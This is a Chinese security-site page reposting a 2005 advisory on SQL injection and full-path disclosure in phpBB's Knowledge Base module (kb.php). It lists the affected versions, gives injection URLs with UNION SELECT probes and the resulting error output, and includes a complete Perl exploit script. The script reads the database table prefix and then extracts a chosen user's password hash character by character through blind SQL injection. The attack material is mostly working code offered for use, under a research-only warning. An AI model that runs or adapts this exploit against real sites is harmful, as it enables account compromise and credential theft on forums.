首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpBB Knowledge Base模块SQL注入和完整路径泄露漏洞
来源:deluxe@security-project.org 作者:deluxe89 发布时间:2005-04-22  

phpBB Knowledge Base模块SQL注入和完整路径泄露漏洞


受影响系统:
phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.13
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0 RC4
phpBB Group phpBB 2.0 RC3
phpBB Group phpBB 2.0 RC2
phpBB Group phpBB 2.0 RC1
phpBB Group phpBB 2.0 Beta 1
phpBB Group phpBB 2.0
phpBB Group phpBB 1.4.4
phpBB Group phpBB 1.4.2
phpBB Group phpBB 1.4.1
phpBB Group phpBB 1.4.0
phpBB Group phpBB 1.2.1
phpBB Group phpBB 1.2.0
phpBB Group phpBB 1.0.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 13219

phpBB是一种用PHP语言实现的基于Web的开放源码论坛程序,使用较为广泛。它支持多种数据库作为后端,如Oracle、MSSQL、MySql、PostGres等等。

phpBB的Knowledge Base模块中存在SQL注入漏洞,远程攻击者可能利用此漏洞非法操作数据库。

起因是应用程序在SQL请求中使用用户输入之前没有正确的过滤输入。如果用户能够提供如下输入的话:

/kb.php?mode=cat&cat='

就可得到类似的错误消息:

Could not obtain category data
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax
SELECT * FROM phpbb_kb_categories WHERE category_id = \'
Line : 131
File : /here/is/the/full/path/functions_kb.php

/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0
No match: Categorie doesn't exist.

/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users
Match: DEBUG MODE - SQL-Error

成功利用该漏洞可能导致入侵应用程序,泄漏或修改数据等。

<*来源:deluxe89 (deluxe@security-project.org)

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111384185116335&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/perl

use strict;
use IO::Socket::INET;


$| = 1;
print "
#########################
# phpBB KnowledgeBase Hack - Exploit
#
# Discovered by [R] and deluxe89
# Exploit by deluxe89
#########################
\n";

if($#ARGV < 2)
{
print "Usage: ./phpbb_kb.pl host path userid [proxy:port]\n";
print "Example: ./phpbb_kb.pl www.host.com /phpBB2/ 2 127.0.0.1:80\n";
exit;
}


my $debug = 0;

my $host = $ARGV[0];
my $path = $ARGV[1];
my $userid = $ARGV[2];
my $prefix = '';


my ($addr, $port) = ($ARGV[3] ne '') ? split(/:/, $ARGV[3]) : ($host, 80);
if($ARGV[3] ne '')
{
print "[+] Using a proxy\n";
}
else
{
print "[+] You're using NO proxy!\n";
sleep(3);
}

#
# Get the table prefix
#

my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

my $value = "mode=cat&cat='";
print $sock "GET http://$host${path}kb.php?$value HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\n\r\n";

while(<$sock>)
{
if($_ =~ m/FROM (\w+)kb_categories/)
{
$prefix = $1;
print "[+] Table prefix: $prefix\n";
last;
}
}
if($prefix eq '')
{
die("[-] Getting the table prefix failed.\n");
}


#
# Getting the hash
#

print "[+] Getting the hash. Please wait some minutes..\nHash: ";


my $hash = '';
for(my $i=1;$i<33;$i++)
{
my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

if(&test($i, 96)) # buchstabe
{
for(my $c=97;$c<103;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
else # zahl
{
#print "0-4\n";
for(my $c=48;$c<58;$c++)
{
if(&test($i, $c, 1))
{
print pack('c', $c);
last;
}
}
}
}
print "\n";


sub test
{
my ($i, $num, $g) = @_;

my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
my $value = "mode=cat&cat=0+union+select+0,1,3,3,7,0+from+${prefix}users +where+user_id=$userid+and+ascii(substring(user_pa ssword,$i,1))";
$value .= ($g) ? '=' : '>';
$value .= "$num/*";

if($debug)
{
print "\t$value\n";
}


print $sock "GET http://$host${path}kb.php?$value HTTP/1.1\r\nHost: $host\r\nConnection: Close\r\n\r\n";

my $if = 0;
while(<$sock>)
{
if($_ =~ m/DEBUG MODE/)
{
return 1;
}
}
return 0;
}

建议:
--------------------------------------------------------------------------------
厂商补丁:

phpBB Group
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.phpbb.com/




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BitchX Buffer Overflow
·ASPNuke comments.asp and detai
·ICMP Attacks Against TCP Vulne
·MSN Messenger PNG Image Buffer
·Multiple Exploit Codes for Ora
·FOXmail POC exploit
·PMsoftware Mini HTTP Server Re
·Savant Web Server 3.1 Remote B
·Multiple Vendor TCP/IP Impleme
·CA BrightStor ARCserve Backup
·WheresJames Webcam Publisher R
·Exim 4.x 'spa_base64_to_bits()
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved